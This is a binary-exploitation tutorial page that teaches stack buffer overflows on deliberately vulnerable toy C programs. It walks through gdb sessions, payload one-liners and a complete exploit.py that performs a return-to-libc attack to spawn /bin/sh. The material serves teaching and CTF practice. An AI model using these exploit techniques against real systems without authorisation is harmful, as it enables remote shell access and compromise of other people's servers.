## Bring on the shell!¶

Right, so you just redirected the control flow to execute the win function. Previously win() just printed out “Win” on to the screen. Now consider the same stack-example.c file, but this time we change the definition of win.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 /* stack-example-shell.c */ #include #include void win() { system("/bin/sh"); exit(0); } void vuln() { char arr[0x10]; scanf("%s",arr); printf("Input : %s",arr); } int main() { vuln(); return 0; } 

Binary file: stack-example-shell

Before we even go into disassembling this, what do think the system function does? It basically executes a shell command. The argument that is passed to it is “/bin/sh”, so the whole statement system(“/bin/sh”) is basically equivalent to typing /bin/sh on the terminal. Let’s do exactly just that and type /bin/sh on the terminal. What did you get? This is a shell, similar to bash, but less advanced. Try typing commands like pwd, ls, whoami etc and observe the output. Thus we can see that system(“/bin/sh”) will land us a shell.

Now let’s see the disassembly of vuln -

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16  0x0804846b <+0>: push ebp 0x0804846c <+1>: mov ebp,esp 0x0804846e <+3>: sub esp,0x10 0x08048471 <+6>: lea eax,[ebp-0x10] 0x08048474 <+9>: push eax 0x08048475 <+10>: push 0x8048530 0x0804847a <+15>: call 0x8048350 <__isoc99_scanf@plt> 0x0804847f <+20>: add esp,0x8 0x08048482 <+23>: lea eax,[ebp-0x10] 0x08048485 <+26>: push eax 0x08048486 <+27>: push 0x8048533 0x0804848b <+32>: call 0x8048330 <printf@plt> 0x08048490 <+37>: add esp,0x8 0x08048493 <+40>: nop 0x08048494 <+41>: leave 0x08048495 <+42>: ret 

As you can see, this time we only have to give 0x10 bytes of junk data and then 4 more bytes for ebp, to reach the saved eip. After that we overwrite the saved eip with the address of win. Let’s find the address of win first -

 1 2 3 4 5 (gdb) info functions win All functions matching regular expression "win": Non-debugging symbols: 0x080484cb win 

Now let’s write the payload and send it.

 1 2 3 4 5 6 7 8 9 (gdb) ! python -c 'print "A"*0x14+"\xcb\x84\x04\x08"' > /tmp/inp (gdb) b*vuln+42 Breakpoint 1 at 0x804850c (gdb) r < /tmp/inp Starting program: /home/vignesh/Documents/stack-example-shell < /tmp/inp Breakpoint 1, 0x0804850c in vuln () (gdb) si 0x080484cb in win () 

Outside gdb, we can get a proper shell. ./stack-example-shell < /tmp/inp will give the shell alright, but the issue will be that the shell will close before you can givve any input. To keep the shell open you can do this -

 1 2 3 (cat /tmp/inp;cat) | ./stack-example-shell ls stack-example-shell stack-example-shell.c 

The first cat /tmp/inp prints the payload and the second cat keeps the shell open. We redirect the input with a pipe in this case.

So, how does getting the binary to spawn a shell progress us from just a simple printf statement? Well, currently we ran the binary and the exploit locally on our own system. Now imagine that the binary is hosted on a server somewhere and you send the payload as an input. What happens? Yes, you get a shell on the server! With the shell, you can do almost anything on the server. Thus in most cases, our aim will be to redirect control flow and get a shell.

Everytime you write a C program, you are sure to use one or the other of the inbuilt functions, like printf, scanf, puts etc. Have you wondered where the definitions of these functions lie? All the standard C functions have been compiled into a single file, named the standard C library or the libc. A libc is native to the system that you are working on and is independent of the binary (compiled program). You can use the ldd command to find out which libc is being used by an application.

 1 2 3 4 $ldd ./ret2libc linux-gate.so.1 => (0xf76df000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74fd000) /lib/ld-linux.so.2 (0xf76e0000)  Thus /lib/i386-linux-gnu/libc.so.6 is the libc that is being used by the binary. The libc is ‘linked’ to the binary at execution time. Thus, if you just load a binary into gdb and then try doing disas puts you will not get the actual disassembly of the puts function. This is because the program is not currently running and thus the libc is not yet loaded. Whereas, once the program is running, you can see the full disassembly of puts or any other libc function for that matter.   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 (gdb) disas puts ←-No libc loaded thus puts will not exist right now No symbol table is loaded. Use the "file" command. (gdb) start ←-Start executing the binary. Libc gets loaded now Temporary breakpoint 1 at 0x8048499 Starting program: /home/vignesh/Documents/a.out Temporary breakpoint 1, 0x08048499 in main () (gdb) disas puts ←-Now libc is loaded and thus puts exists Dump of assembler code for function _IO_puts: 0xf7e55ca0 <+0>: push ebp 0xf7e55ca1 <+1>: mov ebp,esp 0xf7e55ca3 <+3>: push edi 0xf7e55ca4 <+4>: push esi 0xf7e55ca5 <+5>: push ebx ....  Understanding the libc is pretty important from an exploitation point of view as we can redirect the control flow to libc functions as we will see in the following section. Since a libc file is native to a system, each of us can have a different libc file. Thus for comprehensibility between the libc addresses used in this wiki and those while you try out the challenges yourself, we will provide the libc file along with the binary. To run programs with a libc file other than your host libc, you can used the LD_PRELOAD environment variable. For example, if you want to use a libc - libc.so - instead of your original one, you can set LD_PRELOAD to path of the libc function  1 2 3 $ ls a.out libc.so $export LD_PRELOAD=./libc.so  Within gdb, you can set LD_PRELOAD like this - (gdb) set environment LD_PRELOAD=./libc.so ## Return-to-libc¶ So now you know what a buffer overflow vulnerability is and also how to use it to control the flow to the application and execute an address of our choice. In the previous section, we directed the control flow to execute a function called win. With the help of this function we spawned a shell. But you might be wondering, surely no real world programs would contain such helpful functions like our ‘win’? Well, you are right there. But what most of the applications do have access to would is the standard C shared library or ‘libc’. The libc contains all the standard functions that can be used by any C program. The ‘win’ function previously used, actually called the C function, ‘system’, which executes a shell command. The system function, as already mentioned, is a standard C function, which means that it will surely exist in the libc. If you check out the man page of ‘system’, then you will notice that the argument is actually a pointer to the command to be executed. The string “/bin/sh” will also be present in the libc, and thus getting a pointer is just to note the address of this string. So before proceeding further, let’s get our aim clear. We want to exploit a simple buffer overflow bug, the same as the previous section, but this time there will be no ‘win’ type functions to make life easy for us. For our example, the aim will be to get our vulnerable application to spawn a shell. Thus we need to overwrite the return address with the address of ‘system’ function and provide the argument as a pointer to “/bin/sh” Ok, three paras of theory is more than enough! Let’s get our hands dirty now. We’ll use the same code as in the previous section, but without the win function.   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 /* ret2libc.c */ #include void vuln() { char arr[0x10]; scanf("%s",arr); printf("Input : %s",arr); } int main() { vuln(); return 0; }  Binary file: ret2libc libc: libc.so.6 First let’s take a look a the disassembly of main -  1 2 3 4 5 6  0x08048496 <+0>: push ebp 0x08048497 <+1>: mov ebp,esp 0x08048499 <+3>: call 0x804846b <vuln> 0x0804849e <+8>: mov eax,0x0 0x080484a3 <+13>: pop ebp 0x080484a4 <+14>: ret  Now here’s the disassembly of vuln -   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16  0x0804846b <+0>: push ebp 0x0804846c <+1>: mov ebp,esp 0x0804846e <+3>: sub esp,0x10 0x08048471 <+6>: lea eax,[ebp-0x10] 0x08048474 <+9>: push eax 0x08048475 <+10>: push 0x8048530 0x0804847a <+15>: call 0x8048350 <__isoc99_scanf@plt> 0x0804847f <+20>: add esp,0x8 0x08048482 <+23>: lea eax,[ebp-0x10] 0x08048485 <+26>: push eax 0x08048486 <+27>: push 0x8048533 0x0804848b <+32>: call 0x8048330 <printf@plt> 0x08048490 <+37>: add esp,0x8 0x08048493 <+40>: nop 0x08048494 <+41>: leave 0x08048495 <+42>: ret  As you can see, this time we only have to give 0x10 bytes of junk data and then 4 more bytes for ebp, to reach the saved eip. Earlier we overwrote the saved eip with the address of the win function, but now we will overwrite it directly with the address of system. Here is how you find the address of system -  1 2 3 4 5 6 7  (gdb) start Temporary breakpoint 1 at 0x8048499 Starting program: /home/vignesh/Documents/ret2libc Temporary breakpoint 1, 0x08048499 in main () (gdb) print system$1 = {<text variable, no debug info>} 0xf7e5a940 <system> 

Thus the address of system is 0xf7e5a940. Let’s craft our input and then run the program with that input

  1 2 3 4 5 6 7 8 9 10  (gdb) b*vuln+42 Breakpoint 1 at 0x8048495 (gdb) ! python -c 'print "A" * 0x14 + "\x40\xa9\xe5\xf7"' > /tmp/inp (gdb) r < /tmp/inp Starting program: /home/vignesh/Documents/ret2libc < /tmp/inp Breakpoint 1, 0x08048495 in vuln () (gdb) x/i \$eip => 0x8048495 <vuln+42>: ret (gdb) si 0xf7e5a940 in system () from ./libc.so.6 

Right, so we entered system. But what about the argument? Well, let’s fix that now. Do you remember how arguments are passed to function in x86? Yes, they are pushed on to the stack, in reverse order, before the function is called. So basically, arguments of the function are found, starting from ebp+0x8, ebp+0xc, ebp+0x10 and so on, ebp+0x4 being the return address of the function.

So in our case, the ret instruction at the end of the vuln function is calling system. Thus the stack address which initially contained the saved eip and now contains the address to system(), will be the ebp, when system() is executing. Thus the return address of system is the one directly above (i.e 4 byte’s on top) and then come the arguments. For us there is only one argument and that is the pointer to the string /bin/sh. Let’s find out the address of this string in the libc -

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 (gdb) r < /tmp/inp Breakpoint 1, 0x08048495 in vuln () (gdb) info proc map process 16302 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x8048000 0x8049000 0x1000 0x0 /home/vignesh/Documents/ret2libc 0x8049000 0x804a000 0x1000 0x0 /home/vignesh/Documents/ret2libc 0x804a000 0x804b000 0x1000 0x1000 /home/vignesh/Documents/ret2libc 0x804b000 0x806d000 0x22000 0x0 [heap] 0xf7e1f000 0xf7e20000 0x1000 0x0 0xf7e20000 0xf7fcd000 0x1ad000 0x0 /home/vignesh/Documents/libc.so.6 0xf7fcd000 0xf7fce000 0x1000 0x1ad000 /home/vignesh/Documents/libc.so.6 0xf7fce000 0xf7fd0000 0x2000 0x1ad000 /home/vignesh/Documents/libc.so.6 0xf7fd0000 0xf7fd1000 0x1000 0x1af000 /home/vignesh/Documents/libc.so.6 0xf7fd1000 0xf7fd5000 0x4000 0x0 0xf7fd5000 0xf7fd8000 0x3000 0x0 [vvar] 0xf7fd8000 0xf7fd9000 0x1000 0x0 [vdso] 0xf7fd9000 0xf7ffc000 0x23000 0x0 /lib/i386-linux-gnu/ld-2.23.so 0xf7ffc000 0xf7ffd000 0x1000 0x22000 /lib/i386-linux-gnu/ld-2.23.so 0xf7ffd000 0xf7ffe000 0x1000 0x23000 /lib/i386-linux-gnu/ld-2.23.so 0xfffdd000 0xffffe000 0x21000 0x0 [stack] (gdb) find 0xf7e20000, 0xf7fd1000 , "/bin/sh" 0xf7f78e8b 1 pattern found. (gdb) x/s 0xf7f78e8b 0xf7f78e8b: "/bin/sh" 

We first find the starting and the ending addresses of libc with info proc map and then use these in the find command. Refer here if you are not clear with the find command.

Thus the 0xf7f78e8b is a pointer to the string /bin/sh. Now let’s put together the whole exploit. Writing the exploit in a separate file, as a python script might prove to be a bit more convenient rather than writing it inline in gdb.

  1 2 3 4 5 6 7 8 9 10 ''' exploit.py ''' inp="A"*0x10 # The initial junk bytes to fill u the stack space inp+="A"*4 # To overwrite the saved ebp inp+="\x40\xa9\xe5\xf7" # Overwrite the save eip with address of system inp+="AAAA" # This is the return address of system. Since it will never return, we can give junk here. inp+="\x8b\x8e\xf7\xf7" #The argument to system. This is the pointer to the string "/bin/sh" open("/tmp/inp",'w').write(inp) # Open /tmp/inp for writing and put inp in it ''' run "python exploit.py" in the terminal to run this file ''' 
 1 2 3 4  (gdb) r < /tmp/inp Breakpoint 1, 0x08048495 in vuln () (gdb) c process 17735 is executing new program: /bin/dash 

Thus the program executed system with the argument “/bin/sh”, resulting in a shell.

Therefore we were able to execute a shell without any helper functions. Instead of system we can redirect the control flow to any standard C function. This technique is known as return-to-libc or ret2libc.

Unfortunately this exploit will not work outside gdb, due to a mitigation technique called Address Space Layout Randomization (ASLR). We will discuss more about this mitigation and how to bypass this in the later sections.